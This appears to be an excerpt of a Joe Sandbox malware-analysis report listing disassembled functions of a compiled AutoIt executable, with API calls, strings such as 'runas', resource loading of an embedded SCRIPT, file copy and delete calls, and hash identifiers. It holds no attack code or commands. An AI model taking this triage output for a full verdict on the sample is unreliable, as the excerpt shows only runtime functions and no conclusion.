Part of subcall function 00B1434A: _memset.LIBCMT ref: 00B14370
Part of subcall function 00B1434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B14415

Strings

This is a third-party compiled AutoIt script., xrefs: 00B4D279
runas, xrefs: 00B4D33A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 5392ce3c60d06f88a75e3cf4f1abe3d3ed0eed25fb20cb60a0170266f0424d2e
Instruction ID: 5e3fb23db038838bda5b9dbb021cdb296a169b84e9abcef37529f4e976220170
Opcode Fuzzy Hash: 5392ce3c60d06f88a75e3cf4f1abe3d3ed0eed25fb20cb60a0170266f0424d2e
Instruction Fuzzy Hash: DB51E671949208AACB11EBB4DC55EFDBBF8EB45710F8040E7F451A3261EE704A89CB61

Function 00B149A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00B149CD

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

GetCurrentProcess.KERNEL32(?,00B9FAEC,00000000,00000000,?), ref: 00B14A9A
IsWow64Process.KERNEL32(00000000), ref: 00B14AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B14AE7
FreeLibrary.KERNEL32(00000000), ref: 00B14AF2
GetSystemInfo.KERNEL32(00000000), ref: 00B14B23
GetSystemInfo.KERNEL32(00000000), ref: 00B14B2F

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 8f85338f5048c709ebe2f1540bab6ebd32029f902e4bc1e26556d39cce6cee80
Instruction ID: cc97141c7c6921f21cd184c7ec593640b603e4bec3534d5b10ae9a07766e8bc7
Opcode Fuzzy Hash: 8f85338f5048c709ebe2f1540bab6ebd32029f902e4bc1e26556d39cce6cee80
Instruction Fuzzy Hash: FB91C53198D7C1DEC731CB6895901EAFFF5AF2A300B8449EED0C693A41D720A988D759

Function 00B14E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B14D8E,?,?,00000000,00000000), ref: 00B14E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B14D8E,?,?,00000000,00000000), ref: 00B14EB0
LoadResource.KERNEL32(?,00000000,?,?,00B14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B14E2F), ref: 00B4D937
SizeofResource.KERNEL32(?,00000000,?,?,00B14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B14E2F), ref: 00B4D94C
LockResource.KERNEL32(00B14D8E,?,?,00B14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B14E2F,00000000), ref: 00B4D95F

Strings

SCRIPT, xrefs: 00B14EA6

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: c71f9299c730919c7921b769f5a35c39f5d128ad75fc50cdabe753e3efc47c1f
Instruction ID: d4e90277bcc12a45868a15e25b427472301db2bcba66cd5d90a04e28f4fc12da
Opcode Fuzzy Hash: c71f9299c730919c7921b769f5a35c39f5d128ad75fc50cdabe753e3efc47c1f
Instruction Fuzzy Hash: 37112EB5240701BFDB258B65ED48F777BBAFBC5B61F2042A9F405D6250DB61E8408660

Function 00B1FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: be58f7cdadb76780ca774316cef22da5391eb2b1e556b77adbfad780f11deeae
Instruction ID: 768dfa6ddfb52fa83b3c25bcd0f6881d90e0f2cfb216fa11e5340aa4a2a49c68
Opcode Fuzzy Hash: be58f7cdadb76780ca774316cef22da5391eb2b1e556b77adbfad780f11deeae
Instruction Fuzzy Hash: 58928D706183518FD720EF14C480B6AB7E1FF89304F5489ADE89A8B362D775EC85CB92

Function 00B7445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00B4E398), ref: 00B7446A
FindFirstFileW.KERNELBASE(?,?), ref: 00B7447B
FindClose.KERNEL32(00000000), ref: 00B7448B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 53177bed38d56800b41381272d8262819c8399ffbb64ceb4644f8cf84f2fdf6e
Instruction ID: 0b5b61f8e1732bb0adc85777514d47d2af86a1542d78a4326bb5165fb9991f63
Opcode Fuzzy Hash: 53177bed38d56800b41381272d8262819c8399ffbb64ceb4644f8cf84f2fdf6e
Instruction Fuzzy Hash: 62E0D8334145016742106B38EC4D5F9779CDE06336F244756F839C21D0EF745900A595

Function 00B1DF00 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80f84df3be38d9029fe630ad59bbec5980fabd4bb1f5eae76ece26b1e06c98b
Instruction ID: 47d489879533031bd16961d314b6d0e485ef3a3a4f782c6bbc8c244eb2fe9ece
Opcode Fuzzy Hash: c80f84df3be38d9029fe630ad59bbec5980fabd4bb1f5eae76ece26b1e06c98b
Instruction Fuzzy Hash: D822ABB0A002159FDB14DF54C494AEAB7F0FF08310F6485A9EC66AB351E774EA85CB91

Function 00B1E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00B53E62

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 2cc6ad91233676ca61a9f7d8cbd576d9b921d7bfd38cc27938699d528db70b28
Instruction ID: 55a711dde443e3ac7d4e85afcb703f04d9eacb5667403ad5d8129aa429345f77
Opcode Fuzzy Hash: 2cc6ad91233676ca61a9f7d8cbd576d9b921d7bfd38cc27938699d528db70b28
Instruction Fuzzy Hash: 92A25975A00215CBCB24CF58C490AEAB7F2FF59314FA480A9EC25AB351D775ED86CB90

Function 00B209D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B20A5B
timeGetTime.WINMM ref: 00B20D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B20E53
Sleep.KERNEL32(0000000A), ref: 00B20E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00B20EFA
DestroyWindow.USER32 ref: 00B20F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B20F20
Sleep.KERNEL32(0000000A,?,?), ref: 00B54E83
TranslateMessage.USER32(?), ref: 00B55C60
DispatchMessageW.USER32(?), ref: 00B55C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B55C82

Strings

@GUI_WINHANDLE, xrefs: 00B54F8F
@TRAY_ID, xrefs: 00B5578F
@GUI_CTRLID, xrefs: 00B54F3A
@COM_EVENTOBJ, xrefs: 00B554F0
@GUI_CTRLHANDLE, xrefs: 00B54FE4

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 9269012838ad2d6b45c642d4111faf1e109bd223e5077204964a2c520912d659
Instruction ID: 9890c353f4893a51d4b46e7b0c89849bd5bf7f45ed3c4d1d2436582054b56d27
Opcode Fuzzy Hash: 9269012838ad2d6b45c642d4111faf1e109bd223e5077204964a2c520912d659
Instruction Fuzzy Hash: 57B29F70608741DBD734EF24C894BAAB7E5FF84305F1449DDE899972A1DB71E888CB82

Function 00B79155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B78F5F: __time64.LIBCMT ref: 00B78F69

Part of subcall function 00B14EE5: _fseek.LIBCMT ref: 00B14EFD

__wsplitpath.LIBCMT ref: 00B79234

Part of subcall function 00B340FB: __wsplitpath_helper.LIBCMT ref: 00B3413B

_wcscpy.LIBCMT ref: 00B79247
_wcscat.LIBCMT ref: 00B7925A
__wsplitpath.LIBCMT ref: 00B7927F
_wcscat.LIBCMT ref: 00B79295
_wcscat.LIBCMT ref: 00B792A8

Part of subcall function 00B78FA5: _memmove.LIBCMT ref: 00B78FDE
Part of subcall function 00B78FA5: _memmove.LIBCMT ref: 00B78FED

_wcscmp.LIBCMT ref: 00B791EF

Part of subcall function 00B79734: _wcscmp.LIBCMT ref: 00B79824
Part of subcall function 00B79734: _wcscmp.LIBCMT ref: 00B79837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B79452
_wcsncpy.LIBCMT ref: 00B794C5
DeleteFileW.KERNEL32(?,?), ref: 00B794FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B79511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B79522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B79534

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 3eedc1e38bfc45637c83d8d16cc8558c0547f8dbe1fbab3f43dec8661776bcc4
Instruction ID: d13306c1283b279924c662ec7ffac69ef2034e620f45d9fd0f5489d7f0cc3db2
Opcode Fuzzy Hash: 3eedc1e38bfc45637c83d8d16cc8558c0547f8dbe1fbab3f43dec8661776bcc4
Instruction Fuzzy Hash: 50C14CB1D00219AADF21DF94CC85ADEB7F9EF45310F1080EAF609E7151DB309A858F65

Function 00B1301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B13074
RegisterClassExW.USER32(00000030), ref: 00B1309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B130AF
InitCommonControlsEx.COMCTL32(?), ref: 00B130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B130DC
LoadIconW.USER32(000000A9), ref: 00B130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B13101

Strings

+, xrefs: 00B1305D
AutoIt v3 GUI, xrefs: 00B13090
TaskbarCreated, xrefs: 00B130A4
0, xrefs: 00B13056

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5833b967b85e81187f3831a5441bd00dd6277159a106b17190b9f60798d03704
Instruction ID: c55bcd5addeeeb8e6ca149edc245060541555e81c0d7789fe14e20f83438c200
Opcode Fuzzy Hash: 5833b967b85e81187f3831a5441bd00dd6277159a106b17190b9f60798d03704
Instruction Fuzzy Hash: 363129B1941209AFDB10CFA4D845BDDBBF4FB08320F10412AE590E72A0EBB54595CF90

Function 00B13041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B13074
RegisterClassExW.USER32(00000030), ref: 00B1309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B130AF
InitCommonControlsEx.COMCTL32(?), ref: 00B130CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B130DC
LoadIconW.USER32(000000A9), ref: 00B130F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B13101

Strings

+, xrefs: 00B1305D
AutoIt v3 GUI, xrefs: 00B13090
TaskbarCreated, xrefs: 00B130A4
0, xrefs: 00B13056

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 95e08d723ac1318fd1ed82f6be7493a418b53a9ac9171276bb975d936ffd85a5
Instruction ID: adcabbb9294b3073f37ef5ba5df44a7f6ca489f03697d2f985ecedc6f9384dd4
Opcode Fuzzy Hash: 95e08d723ac1318fd1ed82f6be7493a418b53a9ac9171276bb975d936ffd85a5
Instruction Fuzzy Hash: 3921E5B1901209AFDB10DFA4E949BEDBBF8FB08710F10412BF510E72A0EBB645449F91

Function 00B1708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B14706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00BD52F8,?,00B137AE,?), ref: 00B14724

Part of subcall function 00B3050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B17165), ref: 00B3052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B171A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B4E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B4E909
RegCloseKey.ADVAPI32(?), ref: 00B4E947
_wcscat.LIBCMT ref: 00B4E9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 00B1719E
\Include\, xrefs: 00B17165
Include, xrefs: 00B4E8BF, 00B4E900
\, xrefs: 00B4E9C3

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 24a604f489fb8302a9dd5806860b2974003fc84f4d47999a9442591d7c80669a
Instruction ID: a083095ff3834acb81a6b44349e859004e622c3d936ca3412d1da26bccbc153b
Opcode Fuzzy Hash: 24a604f489fb8302a9dd5806860b2974003fc84f4d47999a9442591d7c80669a
Instruction Fuzzy Hash: 57716C715093019EC700EF69E8919ABFBF8FF85350F8009AEF445971A1EF719948CB92

Function 00B13A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B13A50
LoadCursorW.USER32(00000000,00007F00), ref: 00B13A5F
LoadIconW.USER32(00000063), ref: 00B13A76
LoadIconW.USER32(000000A4), ref: 00B13A88
LoadIconW.USER32(000000A2), ref: 00B13A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B13AC0
RegisterClassExW.USER32(?), ref: 00B13B16

Part of subcall function 00B13041: GetSysColorBrush.USER32(0000000F), ref: 00B13074
Part of subcall function 00B13041: RegisterClassExW.USER32(00000030), ref: 00B1309E
Part of subcall function 00B13041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B130AF
Part of subcall function 00B13041: InitCommonControlsEx.COMCTL32(?), ref: 00B130CC
Part of subcall function 00B13041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B130DC
Part of subcall function 00B13041: LoadIconW.USER32(000000A9), ref: 00B130F2
Part of subcall function 00B13041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B13101

Strings

0, xrefs: 00B13AF4
#, xrefs: 00B13AFB
AutoIt v3, xrefs: 00B13B05

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d82f57710682a9e55c000393571eddb8cca5b3e59e2505da206810d932c1096d
Instruction ID: 55e5299664251c56bc2cfc9bac97e08cce9044127a8ea3534af9b1e8533a3c87
Opcode Fuzzy Hash: d82f57710682a9e55c000393571eddb8cca5b3e59e2505da206810d932c1096d
Instruction Fuzzy Hash: 92216D75D01304AFEB20CFA4ED19BADBBF4FB08721F10016BE500A72A1EBB55A448F80

Function 00B13633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00B136D2
KillTimer.USER32(?,00000001), ref: 00B136FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B1371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B1372A
CreatePopupMenu.USER32 ref: 00B1373E
PostQuitMessage.USER32(00000000), ref: 00B1374D

Strings

TaskbarCreated, xrefs: 00B13725

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 5a4ece482094b418897baec102de7fb8d31f887aa76ccada254f333a65c4fc80
Instruction ID: 886540198b450ad38844ecfac0e5299758cd5c57cc14175e2b630d5ac7053edd
Opcode Fuzzy Hash: 5a4ece482094b418897baec102de7fb8d31f887aa76ccada254f333a65c4fc80
Instruction Fuzzy Hash: C04143B2204506EBDB245F68EC59FF93BD4EB01B00F9401A6F502D33E1FE659E84A621

Function 00B13766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINE, xrefs: 00B13822
/AutoIt3ExecuteScript, xrefs: 00B138BC
/ErrorStdOut, xrefs: 00B1387D
/AutoIt3ExecuteLine, xrefs: 00B138A7
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00B137AE
CMDLINERAW, xrefs: 00B137FB
/AutoIt3OutputDebug, xrefs: 00B13892

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
